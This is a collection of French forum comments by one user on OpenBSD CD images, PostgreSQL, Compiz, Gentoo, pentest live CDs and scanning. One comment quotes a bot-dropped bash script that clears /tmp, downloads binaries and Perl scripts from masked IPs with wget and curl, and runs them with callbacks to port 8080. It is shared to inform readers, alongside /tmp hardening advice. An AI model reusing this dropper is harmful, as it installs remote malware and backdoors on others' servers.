Raoul Volfoni a écrit 919 commentaires

Non, car on est intelligent et on vérifie la somme md5 de l'ISO ; somme qui est signée par la clé publique du projet OpenBSD.

Je me rend compte que j'ai dû mal m'exprimer: il n'existe pas d'image ISO officielle du CD d'OpenBSD: qu'on se le dise une bonne fois pour toutes! Par conséquent il ne peut y avoir de somme de contrôle quel qu'elle soit.

Ce que l'on trouve sur certains sites peu respectueux de la volonté de Théo de Raadt, ce sont des images ISO entièrement réalisées par des personnes qui n'appartiennent pas au projet et qui à partir des packages librement disponibles créent leur propre CD complet d'OpenBSD. Ceci est tout à fait légal et autorisé, si tant est que le layout du CD n'est pas le même que celui du CD officiel (celui en vente dont je rappelle qu'il n'existe pas d'image ISO ;). Maintenant leur faire confiance vu qu'il n'y a aucun moyen de vérifier d'où viennent les packages est à mon sens suicidaire, qu'on soit intelligent ou pas. Je rappelle quand même que la sécurité est le crédo principal d'OpenBSD et la raison (officielle) du fork d'avec netBSD.

Maintenant pour en terminer et être certain de m'être bien fait comprendre, il existe bien entendu une image ISO librement téléchargeable sur le site d'OpenBSD: il s'agit juste d'une image d'installation du système de base qui ne contient aucun paquet additionnel. On peut bien heureusement faire une installation complète d'OpenBSD en partant de ce CD et en terminant l'installation par ftp, mais la volonté de Théo et de l'équipe d'OpenBSD est que chaque personne qui utilise leurs softs achète le CD officiel. Je rappelle que presque tous ici utilisons OpenSSH...

Voilà, j'espère que mon effort de clarification n'a pas jeté un trouble supplémentaire, sinon Puffy risque d'appliquer la célèbre formule: qui s'y frotte s'y pique. ;)

PS: OpenBSD fêtera ses 10 années d'existence dans 2 mois.

En quoi est-ce que le CD n'est pas libre ?

Je pense que ce que Sylvain veut dire c'est que l'arborescence du CD (layout) est la propriété de Theo et que non il n'est pas permis de redistribuer des images officielles du CD Original:

The official OpenBSD CD-ROM layout is copyright Theo de Raadt. Theo does not permit people to redistribute images of the official OpenBSD CDs.

Certains ici parlent de télécharger les ISO par bittorrent. Il faut bien savoir qu'il n'existe pas d'image officielle d'OpenBSD qui soit téléchargeable. On peut en trouver deci delà mais pour un OS aussi sécurisé (et non ce n'est pas du flan) il faut être un peu dingue pour les récupérer sur un obscure site Hongrois...

Pour comprendre les raisons de ce choix, il faut aller lire l'explication de Theo:
http://openbsd.org/faq/faq3.html#ISO

Mais bien sûr, s'il n'existe pas d'image officielle téléchargeable, il est toujours possible de s'en faire une soi-même (je vous laisse chercher).

PS: à noter qu'avec la nouvelle faille de Sendmail et les problèmes financiers d'OpenBSD, il vaut mieux ne pas trop le chatouiller sur une ML en ce moment (Cf. FD: http://lists.grok.org.uk/pipermail/full-disclosure/2006-Marc(...) )

PPS: la version 3.9 d'OpenBSD est prévue avec plus d'un mois d'avance sur le calendrier initial. Asta la Vista... ;-)

Une chose que j'ai oublié de préciser, c'est que Sony Online vient de passer à PostGreSQL:

http://www.enterprisedb.com/news_events/press_releases/03_20(...)

Je trouve la présentation de ton article très esthétique et agréable à parcourir. Il y a hélas de trop nombreuses fautes d'othographe et de grammaire qui gâchent un peu sa lecture. [1]

Concernant le contenu je préfère ne pas me prononcer. Etant DBA depuis plus de 20 ans, mon jugement est beaucoup trop biaisé et même si j'adore et utilise PostgreSQL depuis plusieurs années, je ne trouve pas sa comparaison avec Oracle très pertinente (fonctions de clusterisation, partitionnement horizontal et vertical, etc.)

Mais au moment où tous les grands acteurs (IBM, Oracle, Sybase) des SGBD sentent venir le danger et fournissent une version gratuite de leur outil (bridé soit par la taille des bases ou de la RAM, soit par le nombre de processeurs) il est bon de rappeler que PostGreSQL est une alternative tout à fait viable dans la très grande majorité des cas. En ce sens ton article revêt une importance toute particulière dans ce qui s'annonce être une véritable guerre de désinformation. (Quelle grande gueule ce Larry! )

[1]
* ligne 2: gestionnaire de bases de données (il peut y en avoir +ieurs ;)
* ligne 6: PostgreSQL est un système de gestion de bases de données relationnelle -> c'est le système qui est relationnel
* ligne 7: comparables à celles des ces -> de ses
* les contraintes d’intégrités liées aux cléfs (on écrit clés ou clefs)
* peut ensuite les utiliser dans toute l’applications
* réalisons une fonction qui retourne tous les
* Les choses commencent à être intéressantes
* Cela peut-être très utile

Je m'arrête là par manque de temps, mais il reste encore quelques petites coquilles.
Bravo tout de même et bon w-e.

avec Cognitive Software.

-->[]

Je partage tout à fait ton avis. C'est proprement bluffant, même si je n'ai pas pu activer certaines fonctions comme le zoom momentané et autres joyeusetés utilisant la touche windows. Impossible de changer le layout du clavier. :-(

D'autre part je n'ai pas pu non plus modifier ces affectations de raccourcis car contrairement à ce qui est indiqué dans le readme, Compiz est absent des choix de gconf-editor. Et comme je suis une vraie tanche avec X je n'ai pas cherché plus loin.

Mais ce n'est pas grave, je sens que ce soir je vais enfin pouvoir moucher mes gamins avec leur Msn et leurs whizz à la c**. ;)

Parce que le partage c'est quand même sympa de nos jours...

http://linuxtracker.org/download.php?id=1604&name=Korora(...)

Tu trouveras son email tout en bas de cette page:
http://astrosurf.com/astropc/
Ceci dit pour le remercier il faudrait peut-être aussi lui conseiller d'abandonner rapidement son postnuke pour un CMS moins sujet aux failles et attaques en tous genre.

Ca va me donner l'occasion de tester Lazarus que je ne connais pas. Si ça fonctionne je tenterai d'en faire un ebuild pour Gentoo hisoire de faciliter la tâche aux utilisateurs de cette distrib. Finalement je suis très content de voir enfin ce soft passer de gratuiciel à un logiciel libre. Un grand bravo à Patrick pour son merveilleux boulot et son ouverture d'esprit qui lui a permis de voir les bénéfices d'un tel changement.
Maintenant il ne reste plus qu'à changer le titre de la page:
s/Programme gratuit /Logiciel libre.

Il y a aussi un petit nouveau qui me semble assez prometteur: c'est un projet tout jeune et tout propre avec de l'ajax dedans :)
http://www.roundcube.net et une petite démo pour se rendre compte:
http://www.roundcube.net/?p=demo

J'ai jamais réussi à me persuader qu'il était un chevalier blanc seul contre les méchants.

Dis-nous Zorro, tu ne serais pas un peu atteint de schyzophrénie des fois?

Pfiuitt Tornado---->[]

Tu peux effectivement installer Mambo, Wordpress et autre appli Php sur Windows, mais les scripts que les bots tentent de télécharger puis d'exécuter sont des scripts bash et font appel à des commandes Unix (curl et wget) dont je ne connais pas d'équivalent sous Ouinouin.

Pour info voici un de ces scripts dont j'ai masqué les adresses IP car les sites et les vers téléchargés sont encore présents (enfin plus pour très longtemps amha):

#!/bin/bash
cd /tmp
rm -rf *
mkdir .temp
cd .temp
if [ -f cb ]; then
/bin/chmod +x cb
./cb xxx.xxx.xxx.xxx 8080 &
else
wget xxx.xxx.xxx.xxx/cb
/bin/chmod +x cb
./cb xxx.xxx.xxx.xxx 8080 &
fi
if [ -f https ]; then
perl https
else
wget xxx.xxx.xxx.xxx/https
curl -o https xxx.xxx.xxx.xxx/https
perl https
fi
if [ -f ping.txt ]; then
perl ping.txt xxx.xxx.xxx.xxx 8080 &
else
curl -o ping.txt http://xxx.xxx.xxx.xxx/ping.txt
perl ping.txt xxx.xxx.xxx.xxx 8080 &
fi
if [ -f httpd ]; then
/bin/chmod +x httpd
export PATH="."
httpd
else
wget xxx.xxx.xxx.xxx/httpd
chmod +x httpd
export PATH="."
httpd
fi
if [ -f httpd ]; then
/bin/chmod +x httpd
export PATH="."
httpd
else
curl -o httpd xxx.xxx.xxx.xxx/httpd
/bin/chmod +x httpd
export PATH="."
httpd
fi
/bin/rm -rf /tmp/su*

Mais effectivement on devrait pouvoir en faire aisément un wsh. Enfin moi j'ai autre chose à faire... ;-)

... ceux qui se font chopper avec des vulnérabilités aussi anciennes sont sans doutes pas les plus capables et/ou rigoureux.

D'autant plus qu'il suffit de mettre /tmp en noexec, nodev et nosuid pour avoir la paix!
Je ne comprend vraiment pas que l'on fasse tout un foin (Cf. FD en ce moment) pour quelque chose d'aussi insignifiant. Quoiqu'à la réflexion si ça peut faire peur à quelques apprentis admins et les amener à prendre des mesures qui auraient dûes être appliquées dès le départ, c'est peut-être un moindre mal.
Mais je n'aimerai pas que tout ce [battage|foin] finisse par laisser penser au dissaïdor que Linux est moins secure que qui vous savez.

J'ai cette URL sous le coude depuis des mois et non seulement leur projet évolue sans cesse, mais en plus la documentation est vraiment très bien faite:

http://www.c3sl.ufpr.br/multiterminal/index-en.php

C'est le fruit du travail d'un labo d'une université Brésilienne qui souhaitait mutualiser l'utilisation de ses UC pour les cours à ses élèves. Une grande réussite AMHA.

> Peut-être faut-il que tu prennes tes pillules ainsi que tes plussoyeurs !

Je n'ai pas pu le pertinenter car il est déja à +10, mais même si je n'avais qu'une très vague idée de ce qu'est XGL, j'ai tout de suite compris son allusion et tout l'humour de son post.

> Un peu de douceur dans ce monde de brute, merci.

Justement, y'en a aussi. Dommage que tu ne l'ai pas vu.;)

À mon avis la vérité est ailleurs.

Tu ne crois pas si bien dire:
http://seclists.org/lists/nmap-hackers/2004/Oct-Dec/0004.htm(...)

Pour ceux qui ont la flemme d'aller lire le message de Fyodor, le FBI lui a cassé les pieds (doux euphémisme) par le passé pour qu'il fournisse les logs de son serveur (avec les IP de ceux qui avaient téléchargé nmap). On ne peux évidemment pas en déduire qu'il a fermé l'accès à Subversion pour cette seule et unique raison, mais combien d'entre nous auraient fait de même à sa place?

Attention tout de même pour les abonnés Wanadoo qui utilisent les serveurs smtp du FAI. En effet la résolution de smtp.wanadoo.fr n'est pas la même si on fait appel à des DNS autres que ceux de Wanadoo. L'effet de bord d'utiliser d'autres DNS sera de ne plus pouvoir poster de message à moins de mettre l'adresse IP d'un serveur smtp qui accepte les messages des abonnés. Ce genre de plaisanterie m'a fait perdre un temps fou par le passé. :-(
A noter également que parmi les DNS de Wanadoo certains sont donc réservés aux abonnés et par conséquent distribués par le DHCP et d'autres publics avec un comportement différent. Tout un tas jolies galères en perspective.

surtout si c'est Calim' Héros qui a gagné...

C'est précisemment dans ces cas là qu'on est content de ne pas avoir le handicap du capitaine crochet. ;)

En plus de la STD, notons qu'il existe également Auditor basée elle aussi sur une Knoppix:
http://www.remote-exploit.org/index.php/Auditor_main

Arudius basée sur Slack:
http://freshmeat.net/projects/arudius/

Pentoo (je vous laisse deviner la distro d'origine :)
http://www.pentoo.ch/-PENTOO-.html

Pour les analyses après une attaque, il ya Helix:
http://www.e-fense.com/helix/

D'autre part, voici un article intéressant sur les Live-CD spécialisés dans le pen testing dont certains que je vous laisse découvrir:
http://www-128.ibm.com/developerworks/linux/library/l-livecd(...)

Le détourage consiste dans un logiciel adapté à ne sélectionner qu'une partie de la photo en suivant les contours du motif que l'on souhaite. Toi ce que tu veux faire c'est du batch scan:
http://www.xsane.org/doc/sane-xsane-batch-scan-doc.html

Une des seules raisons qui me font conserver un exemplaire de Windows, c'est que mon scanner de diapos (Nikon coolscan 4000) ne dispose de fonctions avancées que sous cet OS. C'est triste mais je ne peux en faire le reproche qu'à Nikon qui ne veut pas libérer ses api sauf à signer des tonnes de NDA ce que je n'ai pas accepté de faire (en même temps je me vois mal coder l'équivalent d'un Nikon scan avec les filtres anti-poussière, le multipasse et l'analyse du bruit par infrarouge).

Donc si tu disposes d'un chargeur automatique (ekta ou bande) je crois que tu n'as pas d'autre alternative que de scanner sous Windows. :-(

Si c'est des photos sur un scanner à plat peut-être existe-t-il une solution mais je ne m'y connais pas suffisament.
Bon courage.

> Comme je suis joueur j'ai validé

T'es même sacrément joueur! Avec Gentoo j'en connait pas beaucoup qui auraient osé. ;)

Je la sens pas trop cette V3 et vous?

http://www.libroscope.org/GPL-V3-France-Telecom-powered

---je reviens le 1/04---->[]

Bon, la thèse du complot n'aura pas duré très longtemps. D'après une remarque très judicieuse de Randal Schwartz (un guru de perl) si Wine a aussi été touché par la faille alors que l'implémentation s'est faite from scratch le complot ne tient plus debout:
http://www.mail-archive.com/full-disclosure%40lists.grok.org(...)

Puis vient une réponse circonstanciée de Peter Ferrie (de chez Symantec) qui explique assez bien le déroulement de l'exécution du code, et les erreur graves commises par Steve Gibson:
http://www.mail-archive.com/full-disclosure%40lists.grok.org(...)

Voilà, vous lisez trop linuxfr, vous pouvez maintenant reprendre une activité normale. ;)

En gros les paquets 'unstable' marqués '~x86' sur l'archi PC n'ont pas encore reçu l'aval du mainteneur pour passer en stable. Normalement tous les paquets passent par cette étape. Quant aux paquets 'hard masqued' marqué '[M]' ils ont un problème qui les empêche soit de fonctionner correctement, soit même tout simplement de compiler.

Un des gros avantages de Gentoo c'est l'excellente qualité de sa documentation: http://www.gentoo.org/doc/fr/list.xml sur laquelle tu pourras trouver plus de détails si tu le souhaites.
Bon w-e.